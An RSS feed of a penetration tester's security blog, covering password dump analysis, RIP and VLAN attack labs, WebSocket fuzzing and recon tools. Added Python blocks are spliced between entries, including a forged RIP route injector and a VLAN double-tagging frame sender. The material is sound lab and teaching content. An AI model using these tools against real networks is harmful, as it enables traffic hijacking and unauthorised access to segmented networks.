DigiNinja - Security and general IT tools and tips
http://digi.ninja/rss.xml
Copyright Robin Wood; en-gb; last updated 2014-07-29T21:50:48+01:00; DigiNinja IT Security.

A Pipal analysis of the Manga Traders password dump, some interesting results when looking at demographics and reuse of username/email addresses as passwords.
http://digi.ninja/projects/pipal.php#mangatraders

A new Pipal checker to look at the relationship between email addresses and passwords.
http://digi.ninja/blog/pipal_email_checker.php

My opinion on the eBay password reset policy - no pasting and 20 character caps are bad.
http://digi.ninja/blog/ebay.php

Custom word list generator based on tweets - Update to use the new Twitter search API
http://digi.ninja/projects/twofi.php
Twofi takes keywords and usernames and collects tweets based on these terms. It then extracts individual words and uses them to create a custom word list. Updated to use the new Twitter search API.

A script I knocked together to import issues from my DradisPro install into MediaWiki so they could be the start of my issues library.
http://digi.ninja/projects/mediawiki_dradis_import.php
For quite a while now I've been planning to import all my Dradis issues into MediaWiki to make reusing issues easier. Until now, each time I wanted to reuse an issue I've had to open a new browser, go back and find the old project where the issue was used, then copy and paste it into the new project, which is a real pain to do.
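As an added example of the kind of email/password relationship the Pipal email checker above looks for, the following Python flags passwords that equal or contain the address's local part, a name token from it, a domain label, or the whole address. This is not Pipal's own checker code, and the email:password list it runs on is constructed here rather than taken from any real dump.

```python
"""Email-to-password relationship checks in the spirit of the Pipal email checker.
Added example, not Pipal code; SAMPLE_DUMP is made up."""
import re
from collections import Counter

# Constructed email:password lines (not real data).
SAMPLE_DUMP = """\
alice.smith@example.com:alice.smith
bob@example.org:Bob123
carol@example.com:example
dave@example.net:password1
erin@example.com:erin@example.com
frank@mail.example.co.uk:Example2014
"""


def classify(email, password):
    """Return the set of relationships between an address and its password."""
    email, pw = email.lower(), password.lower()
    local, _, domain = email.partition("@")
    # Skip short labels such as "co", "com" or "uk": they match far too much.
    labels = [lab for lab in domain.split(".") if len(lab) >= 4]
    found = set()
    if pw == email:
        return {"password_is_email"}
    if pw == local:
        found.add("password_is_local_part")
    elif local in pw:
        found.add("password_contains_local_part")
    else:
        # "alice.smith" also yields the name tokens "alice" and "smith"
        for token in re.split(r"[._\-]+", local):
            if len(token) >= 3 and token in pw:
                found.add("password_contains_name_token")
                break
    if pw == domain or pw in labels:
        found.add("password_is_domain")
    elif any(lab in pw for lab in labels):
        found.add("password_contains_domain")
    return found


def analyse(dump):
    """Count how many email:password lines hit each relationship."""
    counts, total = Counter(), 0
    for line in dump.splitlines():
        email, sep, password = line.partition(":")
        if not sep or "@" not in email:
            continue
        total += 1
        counts.update(classify(email, password))
    return total, counts


if __name__ == "__main__":
    total, counts = analyse(SAMPLE_DUMP)
    for tag, n in counts.most_common():
        print(f"{tag:32s} {n:5d} ({100 * n / total:.1f}%)")
```

Run it on a real email:password list and the percentages are the headline numbers for the kind of reuse the Manga Traders write-up discusses; the token check is what catches "firstname.lastname" local parts reused as half a password.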
So I finally bit the bullet and created a MediaWiki VM. Rather than mess around with manually copying all my issues across I developed this little script to automate it.

Do you include steps to reproduce vulnerabilities in your security reports? In this post I think about how to do this.
http://digi.ninja/blog/reproduce_report.php
Three times in the past few months I've been asked by clients to retest previous findings to see if they have been successfully fixed. One of the reports I was given was one I'd written; the other two were by other testers. For my report I couldn't remember anything about the test. Reading the report gave me some clues, but I was really lucky and found that I'd left myself a test harness in the client's folder, fully set up to test the vulnerability. One of the other two was testing for a vulnerability I'd never heard of and couldn't find anything about on Google. I finally tracked down the original tester and it turns out there is a simple tool which tests for the issue, and one command line script later the retest was over. The final issue was one that I knew about, but it also had a really good write up that, even if I'd not heard of it, gave a full walk through of how to reproduce the test.

Part two of the exploiting RIP series, this time looking at RIPv2 and its authentication mechanisms.
http://digi.ninja/blog/rip_v2.php
In part one of this series, Exploiting RIP, we set up a GNS3 lab with RIPv1 and managed to exploit it by injecting a fake route into the network. As a way to protect against this, RIPv2 can use authentication to try to stop unauthorised routes being added to the system. From what I've read, authentication was not added to RIPv2 as a security mechanism but as a way to prevent routes from accidentally being added when incorrectly configured routers are added to the network.
In this post I'll work through changing the lab from version 1 to version 2 and then enabling the different levels of authentication. At each stage I will show weaknesses in the system and ways to abuse them.

A Pipal analysis of the recent Tesco password disclosure.
http://digi.ninja/projects/pipal.php#tesco

Write up of my efforts to track down what turned out to be an accidental DoS against my Gmail account.
http://digi.ninja/blog/gmail_dos.php
If anyone was watching my Twitter feed over the last few days you'll have seen me complaining about my Gmail account being down. It wasn't down completely: I could still access the web interface and read all my old mail, but I hadn't had any new emails in since 4AM on Thursday. I have various other mail accounts, some Gmail, some not, so I tried sending myself mails from those accounts to see if things were broken or whether I had just become very unpopular. None of the mails got through. I also tested sending emails out and none of those worked either, so there was definitely a problem. By Friday lunchtime I'd had a couple of mails but nothing much, so I figured I'd better do some digging and get it fixed.

Setting up a RIPv1 lab in GNS3 and then exploiting it to poison routes between two machines.
http://digi.ninja/blog/rip_v1.php
In this lab I'm going to look at RIPv1, probably the most basic routing protocol. As with the VLAN labs, I'm building this one in GNS3 and linking it to a VirtualBox machine running Debian. The plan is to build a network with three routers all using RIP to sync their routing information. I'll then use the attacking box to inject a fake route into the network and so divert traffic away from its real target.
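For the two RIP posts above (RIPv1 route injection and RIPv2 authentication), here is an added Python example that is not code from either post. It builds and decodes the UDP/520 messages using the RFC 1058 and RFC 2453 entry formats, shows a forged Response winning under the basic distance-vector update rule, and shows why RIPv2 simple-password authentication does not help: the password sits in clear text in the first entry of every packet, so anyone who can sniff one update can copy it. The addresses and the password are made up, and keyed-MD5 authentication is not modelled.

```python
"""RIPv1/RIPv2 message builder and parser for the RIP labs. Added example,
not code from the posts; addresses and the password are made up."""
import socket
import struct

RIP_RESPONSE = 2
AF_INET = 2
AF_AUTH = 0xFFFF          # entry slot holding authentication data (RFC 2453 s4.1)
AUTH_SIMPLE = 2           # simple (clear text) password
INFINITY = 16             # RIP's "unreachable" metric


def _entry_v1(net, metric):
    # RIPv1 entry: AFI, 2 zero bytes, address, 8 zero bytes, metric (RFC 1058)
    return struct.pack("!HH4s8sI", AF_INET, 0, socket.inet_aton(net), b"\0" * 8, metric)


def _entry_v2(net, mask, next_hop, metric, tag=0):
    # RIPv2 entry: AFI, route tag, address, subnet mask, next hop, metric (RFC 2453)
    return struct.pack("!HH4s4s4sI", AF_INET, tag, socket.inet_aton(net),
                       socket.inet_aton(mask), socket.inet_aton(next_hop), metric)


def build_v1_response(routes):
    """routes: [(network, metric)]. Returns the UDP payload sent to port 520."""
    return struct.pack("!BBH", RIP_RESPONSE, 1, 0) + b"".join(_entry_v1(n, m) for n, m in routes)


def build_v2_response(routes, password=None):
    """routes: [(network, mask, next_hop, metric)]. If password is given, the
    first 20-byte entry becomes a simple-password authentication entry."""
    body = struct.pack("!BBH", RIP_RESPONSE, 2, 0)
    if password is not None:
        body += struct.pack("!HH16s", AF_AUTH, AUTH_SIMPLE, password.encode())
    return body + b"".join(_entry_v2(*r) for r in routes)


def parse(payload):
    """Decode a RIP message: version, routes as (net, mask, next_hop, metric),
    and the clear text password if a simple-auth entry is present."""
    command, version, _ = struct.unpack("!BBH", payload[:4])
    msg = {"command": command, "version": version, "routes": [], "password": None}
    for off in range(4, len(payload), 20):
        entry = payload[off:off + 20]
        afi = struct.unpack("!H", entry[:2])[0]
        if afi == AF_AUTH:
            if struct.unpack("!H", entry[2:4])[0] == AUTH_SIMPLE:
                msg["password"] = entry[4:].rstrip(b"\0").decode()   # on the wire, unencrypted
            continue
        if version == 1:
            _, _, addr, _, metric = struct.unpack("!HH4s8sI", entry)
            msg["routes"].append((socket.inet_ntoa(addr), None, None, metric))
        else:
            _, _, addr, mask, nh, metric = struct.unpack("!HH4s4s4sI", entry)
            msg["routes"].append((socket.inet_ntoa(addr), socket.inet_ntoa(mask),
                                  socket.inet_ntoa(nh), metric))
    return msg


def apply_response(table, msg, learned_from):
    """Minimal distance-vector update: add one hop, keep the lower metric.
    This is the rule that lets an attacker's low-metric advertisement win."""
    for net, _, _, metric in msg["routes"]:
        new_metric = min(metric + 1, INFINITY)
        if net not in table or new_metric < table[net][0]:
            table[net] = (new_metric, learned_from)
    return table


if __name__ == "__main__":
    # Legitimate route to 10.0.0.0/8 is 3 hops away; the attacker advertises it at 1 hop.
    table = {"10.0.0.0": (3, "192.168.1.1")}
    forged = build_v2_response([("10.0.0.0", "255.0.0.0", "0.0.0.0", 1)], password="lab-secret")
    seen = parse(forged)
    print("password recovered from the wire:", seen["password"])
    print("routing table after forged update:", apply_response(table, seen, "192.168.1.66"))
```

To use the builders in the lab, send the payload with a UDP socket to 224.0.0.9:520 (RIPv2 multicast) or the broadcast address (RIPv1) from the attacking box; to see the password problem, run `parse` over the payload of any RIPv2 update captured with tcpdump.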
If you are not familiar with RIP, it is a hop-based system where each hop counts as one unit and traffic is routed across the path with the fewest hops.

Abusing Cisco Dynamic Trunking Protocol, DTP, to change a switch port from access to trunk mode to gain access to all VLAN traffic.
http://digi.ninja/blog/abusing_dtp.php
In the first two parts of this dig into layer 2 I covered how to set up a lab using GNS3 and VirtualBox and then adding and interacting with VLANs. In this part I want to look at using Cisco's Dynamic Trunking Protocol - DTP - to change the state of a port from access mode to trunk mode, which allows us to gain access to all the VLANs on the network. The previous link gives a more thorough overview of DTP but in summary, it is a protocol developed by Cisco to allow devices connected to a switch to negotiate whether they need their port to be in trunk or access mode. It is enabled by default on all ports, so has to be deliberately disabled by an admin to turn it off. Ports default to access mode, leaving devices such as switches, which need a trunk port, to request it. A port can be changed from one state to the other with a single DTP packet and there is no authentication; this makes it great for an attacker, as you can easily switch your port to trunk mode on any switch which has DTP enabled.

Adding VLANs to the GNS3/VirtualBox Lab
http://digi.ninja/blog/gns_vbox_vlan_lab.php
In this post I show how to add VLANs to the lab and how to move between them on the switch. I then show what can happen if you get on to a trunk port and get to control your own VLAN tagging.
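The VLAN lab post above ends with an attacker on a trunk port choosing their own VLAN tags. As an added Python example (not code from the post, and with made-up MAC addresses and payloads), the following builds and decodes 802.1Q-tagged frames so the VID in the tag is under your control; it also goes slightly beyond the post by stacking two tags, which is the double-tagging variant of VLAN hopping, and includes a raw-socket sender for Linux.

```python
"""Build and decode 802.1Q-tagged Ethernet frames. Added example for the VLAN
lab post, not code from it; MAC addresses and payloads are made up."""
import struct

ETH_P_8021Q = 0x8100      # TPID that announces a VLAN tag
ETH_P_IP = 0x0800


def mac(text):
    """'00:11:22:33:44:55' -> 6 bytes."""
    return bytes.fromhex(text.replace(":", ""))


def build_untagged_frame(dst, src, payload, ethertype=ETH_P_IP):
    return mac(dst) + mac(src) + struct.pack("!H", ethertype) + payload


def build_tagged_frame(dst, src, vid, payload, pcp=0, ethertype=ETH_P_IP):
    """Insert one 802.1Q tag: TPID, then TCI = PCP(3 bits) | DEI(1) | VID(12).
    On a trunk port the sender chooses vid, so this frame lands in that VLAN."""
    if not 1 <= vid <= 4094:
        raise ValueError("VID must be 1..4094")
    tci = ((pcp & 0x7) << 13) | (vid & 0x0FFF)
    return mac(dst) + mac(src) + struct.pack("!HHH", ETH_P_8021Q, tci, ethertype) + payload


def build_double_tagged(dst, src, outer_vid, inner_vid, payload):
    """Stack two tags (outer usually the trunk's native VLAN). A switch that strips
    the outer tag forwards the inner one on, which is the classic VLAN hopping case."""
    inner = build_tagged_frame(dst, src, inner_vid, payload)[12:]   # TPID|TCI|type|data
    return build_tagged_frame(dst, src, outer_vid, inner[2:], ethertype=ETH_P_8021Q)


def decode_frame(frame):
    """Return (dst, src, [vids outer->inner], ethertype, payload)."""
    dst, src = frame[:6].hex(":"), frame[6:12].hex(":")
    off, vids = 12, []
    ethertype = struct.unpack("!H", frame[off:off + 2])[0]
    while ethertype == ETH_P_8021Q:
        tci = struct.unpack("!H", frame[off + 2:off + 4])[0]
        vids.append(tci & 0x0FFF)
        off += 4
        ethertype = struct.unpack("!H", frame[off:off + 2])[0]
    return dst, src, vids, ethertype, frame[off + 2:]


def send_frame(iface, frame):
    """Linux only, needs CAP_NET_RAW: put the crafted frame on the wire unchanged."""
    import socket
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    try:
        sock.bind((iface, 0))
        return sock.send(frame)
    finally:
        sock.close()


if __name__ == "__main__":
    frame = build_tagged_frame("ff:ff:ff:ff:ff:ff", "00:11:22:33:44:55", 20, b"hello vlan 20")
    print(decode_frame(frame))
```

In the lab, `send_frame("eth0", frame)` from the VirtualBox box on the trunk port is the whole attack; the decoder is the check to run on a capture from the victim VLAN to confirm the tag arrived as you set it.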
Integrating GNS3 and VirtualBox - This is the first part of a series integrating GNS3 and VirtualBox to build a lab to play with layer 2 attacks
http://digi.ninja/blog/gns_vbox_basic_lab.php
Having come from a development background rather than a sys-admin one, my knowledge of layer 2 is not as good as I'd like it to be, so I've decided to do something about it. I've always been interested in VLANs and the idea of bypassing them, so I thought that would be a good place to start. This is the first part of a series building a lab to test out different layer 2 attacks.

Sitemap2Proxy takes the sitemap published by a web app and requests each page through your specified proxy. This release adds response code stats to the output.
http://digi.ninja/projects/sitemap2proxy.php

Building a lab with ModSecurity and DVWA.
http://digi.ninja/blog/modsecurity_lab.php
I've been meaning to build a ModSecurity lab for a while and, seeing as I had some free time, I decided it was about time to do it and to document it for everyone to share. The lab I built uses an up-to-date version of ModSecurity with a rule set taken from the SpiderLabs GitHub repo and, so there is something to attack, I've included DVWA.

Version 5.0 of CeWL adds proxy and basic/digest authentication support along with a few small bug fixes.
http://digi.ninja/projects/cewl.php

Extract meta data from videos taken on iPhones.
http://digi.ninja/projects/ivmeta.php
ivMeta is based on information in this article on finding meta data in iPhone videos. It will attempt to pull the following bits of information from an iPhone video:
* Maker - should always be Apple
* iOS software version
* Date the video was taken
* GPS co-ords where the video was taken
* Model of phone

The second part of my introduction to using ZAP to test web sockets, this part focuses on fuzzing.
http://digi.ninja/blog/zap_fuzzing.php
The following article is part two of my introduction to ZAP and testing web sockets; in this episode I'll cover fuzzing. If you've not used ZAP before I suggest you look at some of the official tutorials first - ZAP home page, Videos. You can find my first part here: OWASP ZAP and Web Sockets. The testing is being done against a small web sockets based app I wrote called SocketToMe which has a few published services along with a few unpublished ones. In this article we are going to look at one of the published ones and try to identify some of the unpublished ones. The first feature I'll investigate is the number guessing game. Here the system picks a random number between 1 and 100 and you have to guess it. I'm going to cheat and see if I can get ZAP to play all 100 numbers for me to go for a quick win.

I recently decided it was time to learn how to test web sockets and so decided to take the opportunity to learn a bit about how ZAP works. This two part blog post covers a brief intro to ZAP and how it interacts with web sockets and then looks in depth at how to fuzz them.
http://digi.ninja/blog/zap_web_sockets.php
With the slow uptake of HTML5, web sockets are going to start being seen in more and more applications, so I figured I'd better learn how to test them before being put in front of them on a client test and having to learn as I went along.
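The fuzzing post above has ZAP replay all 100 guesses against the number game. Under the hood every client-to-server WebSocket frame has to be freshly masked (RFC 6455), which is the part a proxy does for you and the part you have to get right if you script it yourself. As an added Python example, not code from the posts or from SocketToMe, this encodes and decodes RFC 6455 frames and generates the 100 masked guess frames; the JSON shape of the guess message is an assumption, since the posts do not show SocketToMe's wire format.

```python
"""RFC 6455 frame encode/decode plus a guess-frame generator for a
number-guessing WebSocket service. Added example, not from the posts or
SocketToMe; the {"action": "guess", "number": n} message shape is assumed."""
import json
import os
import struct

OP_TEXT = 0x1


def encode_frame(payload, opcode=OP_TEXT, mask=True, key=None):
    """Build one unfragmented frame. Client-to-server frames must be masked
    with a 4-byte key; the key is random per frame unless one is supplied."""
    header = bytes([0x80 | opcode])            # FIN set, no extension bits
    n = len(payload)
    mask_bit = 0x80 if mask else 0
    if n < 126:
        header += bytes([mask_bit | n])
    elif n < 0x10000:
        header += bytes([mask_bit | 126]) + struct.pack("!H", n)
    else:
        header += bytes([mask_bit | 127]) + struct.pack("!Q", n)
    if not mask:
        return header + payload
    key = key or os.urandom(4)
    masked = bytes(b ^ key[i % 4] for i, b in enumerate(payload))
    return header + key + masked


def decode_frame(frame):
    """Return (fin, opcode, payload) for one frame, unmasking when the MASK bit is set."""
    b0, b1 = frame[0], frame[1]
    fin, opcode = bool(b0 & 0x80), b0 & 0x0F
    masked, n = bool(b1 & 0x80), b1 & 0x7F
    off = 2
    if n == 126:
        n, off = struct.unpack("!H", frame[2:4])[0], 4
    elif n == 127:
        n, off = struct.unpack("!Q", frame[2:10])[0], 10
    if masked:
        key = frame[off:off + 4]
        off += 4
        payload = bytes(b ^ key[i % 4] for i, b in enumerate(frame[off:off + n]))
    else:
        payload = frame[off:off + n]
    return fin, opcode, payload


def guess_frames(low=1, high=100):
    """Yield (guess, masked_frame) for every number: the 'play all 100' attack as raw frames."""
    for guess in range(low, high + 1):
        msg = json.dumps({"action": "guess", "number": guess})   # assumed message shape
        yield guess, encode_frame(msg.encode())


def winning_guess(frames, secret):
    """Server-side view of the attack: decode each frame and report the guess that hits."""
    for guess, frame in frames:
        _, _, payload = decode_frame(frame)
        if json.loads(payload)["number"] == secret:
            return guess
    return None


if __name__ == "__main__":
    print("server's secret 42 found by guess", winning_guess(guess_frames(), 42))
```

Writing the frames from `guess_frames` to an established socket (after the HTTP upgrade handshake) is a hand-rolled version of the ZAP fuzz run; `decode_frame` is equally useful for reading what the server answers, since server-to-client frames arrive unmasked.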
I figured the best way to do this was to build a very simple application, then throw in a proxy and see what happened. Unfortunately my prox
y of choice, Burp Suite, currently doesn't handle web sockets, so I had to look for one that did. The only one that does, and this is their claim, is the OWASP Zed Attack Proxy, or ZAP for short. I'd been meaning to learn how to use it for a while, so this seemed like the perfect opportunity. If anything in here is wrong, please get in touch and I'll fix it; I'm learning as I go along so may well be doing the odd thing wrong, however it does all seem to work. I started by writing a small web socket based app which I called SocketToMe, which has a few basic services: chat, a number guess game and a couple of other features. I figured I'd start with interception then have a look at fuzzing.

A web socket based application which goes alongside the blog post on ZAP and web sockets.
http://digi.ninja/projects/sockettome.php
SocketToMe is a little application I wrote to go along with my blog post on testing web sockets. It combines chat, a simple number guessing game and a few other hidden features. The app is in two parts, the web socket app and a web page to access it. The whole lot is written in PHP and is the first web socket work I've done, so don't look on it as an example of how to do things.

Pipal now has a modular structure allowing you to write your own Checkers and Splitters, this is a brief introduction to how they both work.
http://digi.ninja/blog/pipal_goes_modular.php

A proof of concept application which takes observed key presses and generates a list of potential passwords.
http://digi.ninja/projects/pat_to_pass.php
This month's BruCON 5x5 project came from an idea sent to me by a friend after I released Passpat. Passpat takes passwords and tries to find keyboard patterns in them; Pat to Pass is almost the opposite, it takes observed key presses and tries to convert them to potential passwords. The project in its current state is more a proof of concept and sample code which hopefully can be taken forward and turned into something practical by someone who has better skills at handling very large lists of data.

Enumerating shares on the SpiderOak network.
http://digi.ninja/projects/spidering_spideroak.php
Spidering SpiderOak - By looking at the differences between responses it is possible to enumerate valid account names and then shares on the SpiderOak network. This post covers how I researched this, the findings and how it could be fixed.

A companion tool to Pipal which can spot keyboard patterns in password lists.
http://digi.ninja/projects/passpat.php
It is generally accepted that most passwords in common use are based on dictionary words; however, some people decide to use keyboard patterns instead, and to try to spot these I've created Passpat. Passpat uses data files containing the layouts of common keyboards to walk each word through the keyboard and score the word based on how close it is to being a pattern. For now I'm taking "pattern" to mean keys which are next to each other; while qpalzm is a pattern, picking something like that up is currently out of the scope of this project.

A simple script to create files containing binary data.
http://digi.ninja/projects/bin_gen.php
While working on a new project I needed a way to create files containing binary data which I could control, for example all bytes from 0 to 255 in order or just a block of ten 0x03 bytes, so I wrote bin_gen.
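The Passpat description above gives the scoring idea: walk the password across a keyboard layout and count how many consecutive keys are neighbours. As an added Python example, not Passpat's own code or its layout data files, the following implements that walk with a US QWERTY approximation built in the block (row offsets are rounded to whole columns, and "adjacent" means the eight surrounding keys, which is the "keys next to each other" definition in the post; shifted symbols are mapped back to their key).

```python
"""Keyboard-pattern scoring in the spirit of Passpat. Added example, not
Passpat code; US_QWERTY is an approximate layout built here."""

# Leading spaces shift a row right to approximate the real stagger.
US_QWERTY = [
    "`1234567890-=",
    " qwertyuiop[]\\",
    " asdfghjkl;'",
    "  zxcvbnm,./",
]
SHIFTED = {"!": "1", "@": "2", "#": "3", "$": "4", "%": "5", "^": "6", "&": "7",
           "*": "8", "(": "9", ")": "0", "_": "-", "+": "=", "{": "[", "}": "]",
           "|": "\\", ":": ";", '"': "'", "<": ",", ">": ".", "?": "/", "~": "`"}


def key_positions(layout):
    """Map each key to a (row, column) coordinate on the layout."""
    pos = {}
    for r, row in enumerate(layout):
        for c, ch in enumerate(row):
            if ch != " ":
                pos[ch] = (r, c)
    return pos


POS = key_positions(US_QWERTY)


def normalise(ch):
    """Lower-case letters and fold shifted symbols onto the key that produces them."""
    ch = ch.lower()
    return SHIFTED.get(ch, ch)


def adjacent(a, b):
    """True when b is one of the eight keys surrounding a (a repeated key is not a move)."""
    pa, pb = POS.get(normalise(a)), POS.get(normalise(b))
    if pa is None or pb is None:
        return False
    return pa != pb and abs(pa[0] - pb[0]) <= 1 and abs(pa[1] - pb[1]) <= 1


def pattern_score(word):
    """Fraction of consecutive key pairs that are neighbours, 0.0 to 1.0."""
    if len(word) < 2:
        return 0.0
    pairs = list(zip(word, word[1:]))
    return sum(adjacent(a, b) for a, b in pairs) / len(pairs)


def find_patterns(passwords, threshold=0.75):
    """Return (password, score) for entries at or above threshold, best first."""
    scored = [(p, pattern_score(p)) for p in passwords]
    return sorted([s for s in scored if s[1] >= threshold], key=lambda s: -s[1])


if __name__ == "__main__":
    for pw, score in find_patterns(["qwerty", "password", "dragon", "qazwsx", "1qaz2wsx"]):
        print(f"{pw:12s} {score:.2f}")
```

Run `find_patterns` over a cracked list and lower the threshold to taste; as the post notes, split-hand patterns such as qpalzm score low under this definition because no two consecutive keys touch.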
There are loads of other ways to do this, especially in Linux, but for me this is quick and easy and I don't have to think to use it.

Using Google Analytics tracking codes to find relationships between domains.
http://digi.ninja/projects/tracker_tracking.php
When doing reconnaissance on clients it is often useful to try to identify other websites or companies who are related to your target. One way to do this is to look at who is managing the Google Analytics traffic for them and then find who else they manage. There are a few online services which do this, probably the best known being ewhois, but whenever you use someone else's resources you are at their mercy over things like accuracy of the data and coverage; especially if you are working for a small client who hasn't been scanned by them, you won't get any results. This is where my tracker tracking tool comes in. The tool is in two parts: the first uses the power of the Nmap engine to scan all the domains you are interested in and pull back tracking codes, which are then output in the standard Nmap format along with the page title. I've then written a second script which takes the output and generates a grouped and sorted CSV file which you can then analyse.

How I'm going to spend my share of the 25,000 euro BruCON 5x5 cash.
http://digi.ninja/blog/brucon_5x5.php
During BruCON 2012 the organisers announced a very generous competition: they had collected 25,000 euro and were going to offer it in 5k euro chunks to five lucky hackers. The condition was you had to submit a proposal saying why you needed the cash. You can read more about it on the BruCON Blog. I'm very pleased to say that I was one of the chosen hackers, so I want to document what I'm going to do with my share of the cash.

Abusing a DDNS service to find IP cameras around the world.
http://digi.ninja/projects/ip_camera_finder.php
When I bought an IP camera to watch my daughter's cot I didn't expect to end up writing tools to find others around the world; I also didn't expect it to be so poorly secured.

An idea for a report writing competition
http://digi.ninja/blog/report_writing_comp.php
A lot of conferences have CTFs, but how about testing people's report writing skills as well? This post contains some ideas I've had to run a competition which would test report writing skills.

A Metasploit module for enumerating directories and files through MySQL
http://digi.ninja/metasploit/mysql_file_enum.php
Tim Tomes wrote a blog post on enumerating directories and files through a MySQL connection; this module automates that process.

DNS reconnaissance against wildcard domains
http://digi.ninja/blog/dns_wildcard_recon.php
I recently did a test against a company and in the debrief they asked how I managed to enumerate so many of their subdomains, as they were using a wildcard DNS setup and the previous tester had commented that it prevented DNS enumeration. When I explained to them how the wildcard only obscured valid domains they had a few choice words for the previous tester, and I figured it would make a nice little blog post.

A story about Hakin9, the kings of spam
http://digi.ninja/blog/hakin9_spam_kings.php
About once a fortnight I get a request to write an article for Hakin9 or one of its sister publications; this article details my attempts to stop this spam.

A review of the Corelan Live Win32 Exploit Dev Bootcamp
http://digi.ninja/blog/corelan.php
I've just got back from BruCON 2012 where I started the week with the Corelan Live - Win32 Exploit Development Bootcamp.
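The tracker tracking project above scans domains for their Google Analytics codes and groups them. The relationship it relies on is that a property ID of the form UA-XXXXXX-Y belongs to account UA-XXXXXX, so two domains sharing the account number are run from the same Analytics login. As an added Python example, not the project's Nmap script or CSV script, this pulls the IDs and page titles from page bodies (constructed here for five hypothetical domains) and writes the grouped, sorted CSV the second script produces.

```python
"""Group domains by the Google Analytics account number found in their pages.
Added example, not the Tracker Tracking scripts; PAGES is constructed."""
import csv
import io
import re
from collections import defaultdict

# ga.js, analytics.js and gtag.js snippets all carry the property ID in this form.
UA_RE = re.compile(r"\bUA-(\d{4,10})-(\d{1,4})\b")
TITLE_RE = re.compile(r"<title[^>]*>(.*?)</title>", re.I | re.S)

# Constructed responses for hypothetical domains (not real sites).
PAGES = {
    "shop.example.com": "<title>Example Shop</title><script>ga('create', 'UA-123456-1', 'auto');</script>",
    "blog.example.com": "<title>Example Blog</title><script>_gaq.push(['_setAccount', 'UA-123456-2']);</script>",
    "partner.example.net": "<title>Partner</title><script>gtag('config', 'UA-123456-3');</script>",
    "unrelated.example.org": "<title>Other</title><script>ga('create', 'UA-987654-1', 'auto');</script>",
    "notracking.example.org": "<title>Plain</title><p>no analytics here</p>",
}


def extract(html):
    """Return (page title, set of account numbers 'UA-XXXXXX' without the property suffix)."""
    title = TITLE_RE.search(html)
    accounts = {"UA-" + m.group(1) for m in UA_RE.finditer(html)}
    return (title.group(1).strip() if title else ""), accounts


def group_by_account(pages):
    """Map each account to the sorted domains using it, biggest group first."""
    groups = defaultdict(list)
    for domain, html in pages.items():
        for acct in extract(html)[1]:
            groups[acct].append(domain)
    ordered = sorted(groups.items(), key=lambda kv: (-len(kv[1]), kv[0]))
    return {acct: sorted(domains) for acct, domains in ordered}


def to_csv(pages):
    """One row per (account, domain, title), grouped by account; domains with no code are omitted."""
    out = io.StringIO()
    writer = csv.writer(out)
    writer.writerow(["account", "domain", "title"])
    for acct, domains in group_by_account(pages).items():
        for domain in domains:
            writer.writerow([acct, domain, extract(pages[domain])[0]])
    return out.getvalue()


if __name__ == "__main__":
    print(to_csv(PAGES))
```

Feeding it real data means replacing PAGES with the bodies you fetched (the project uses Nmap's http scripts for that); grouping on the account number rather than the full property ID is what links the shop, blog and partner sites even though each has a different -Y suffix.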
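The wildcard DNS post above turns on one observation: a wildcard answers for every name, so it hides which names are real, but it cannot make a real host with its own record look like the wildcard. The standard technique is to resolve a few random labels that cannot exist, record what the wildcard returns, then keep only brute-forced names whose answer differs. As an added Python example, not the post's own method or code, the following does that over a constructed in-memory zone so it runs offline; `real_resolve` is the hook for the system resolver. It also handles the awkward case of a real host that happens to share the wildcard's address, which A-record comparison alone cannot separate.

```python
"""Subdomain brute force that survives a wildcard record. Added example, not
from the post; ZONE is a constructed zone and the addresses are documentation
ranges."""
import random
import socket
import string

# Constructed zone: a wildcard plus three real hosts, one of which ("vpn")
# shares the wildcard address and so cannot be told apart by A record alone.
ZONE = {
    "www.example.com": {"203.0.113.10"},
    "mail.example.com": {"203.0.113.20"},
    "vpn.example.com": {"203.0.113.50"},
    "*.example.com": {"203.0.113.50"},
}


def fake_resolve(name):
    """A records for name from ZONE, honouring a single-label wildcard."""
    if name in ZONE:
        return ZONE[name]
    parent = name.split(".", 1)[1]
    return ZONE.get("*." + parent, set())


def real_resolve(name):
    """Production hook: A records via the system resolver; empty set on NXDOMAIN."""
    try:
        return set(socket.gethostbyname_ex(name)[2])
    except socket.gaierror:
        return set()


def wildcard_answers(domain, resolver, probes=3):
    """Resolve a few random labels that cannot exist; whatever comes back is the wildcard."""
    answers = set()
    for _ in range(probes):
        label = "".join(random.choices(string.ascii_lowercase + string.digits, k=16))
        answers |= resolver(f"{label}.{domain}")
    return answers


def brute_force(domain, wordlist, resolver=fake_resolve):
    """Return (found, ambiguous, wildcard): found maps name -> answers that differ
    from the wildcard; ambiguous lists names whose answers are a subset of it."""
    wildcard = wildcard_answers(domain, resolver)
    found, ambiguous = {}, []
    for word in wordlist:
        name = f"{word}.{domain}"
        answers = resolver(name)
        if not answers:
            continue                      # no wildcard and no record: a clean miss
        if answers <= wildcard:
            ambiguous.append(name)        # needs another check (MX, TXT, HTTP vhost...)
        else:
            found[name] = answers
    return found, ambiguous, wildcard


if __name__ == "__main__":
    found, ambiguous, wildcard = brute_force("example.com", ["www", "mail", "vpn", "ftp", "dev"])
    print("wildcard answers:", wildcard)
    print("confirmed:", found)
    print("indistinguishable from wildcard:", ambiguous)
```

Against a live target swap in `resolver=real_resolve` and a proper wordlist; names that land in `ambiguous` are not necessarily noise, which is exactly why a wildcard is an obstacle rather than a block.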
A lot of people asked about the course and what it covered, so I've put this together.

Extract all URLs from a sitemap.xml file and request them through a proxy of your choosing.
http://digi.ninja/projects/sitemap2proxy.php
When doing a web app test you usually end up spidering the site you are testing, but what if the site could tell you most of that without you going hunting for it? Bring on sitemap.xml, a file used by a lot of sites to tell spiders, like Google, all about their content. This script takes that file and parses it to extract all the URLs, then requests each one through your proxy of choice (Burp, ZAP, etc). Now this won't find anything that isn't mentioned in the file and it won't do any brute forcing, but it is a nice way to identify all the pages on the site that the admins want you to know about.

Version 4.3 of CeWL adds result sorting by word count, with optional display of the count, plus various bug fixes.
http://digi.ninja/projects/cewl.php

Hostapd Karma patches updated to hostapd version 1.0
http://digi.ninja/karma/
Hostapd was recently updated to version 1.0 so I've brought the Karma patches up to date. This release contains a fully patched source tarball and a patch file if you want to apply it to your own source. I've also added a mention of the hostapd_cli app which you can use to control hostapd once it is running.

Are signs of the zodiac used as passwords?
http://digi.ninja/blog/zodiac_passwords.php
I was wondering why dragon and monkey come up so often in Pipal analysis of password lists and it got me wondering if it was to do with Chinese signs of the zodiac, so just as an experiment I've added checking for both Western and Chinese zodiac signs to Pipal.
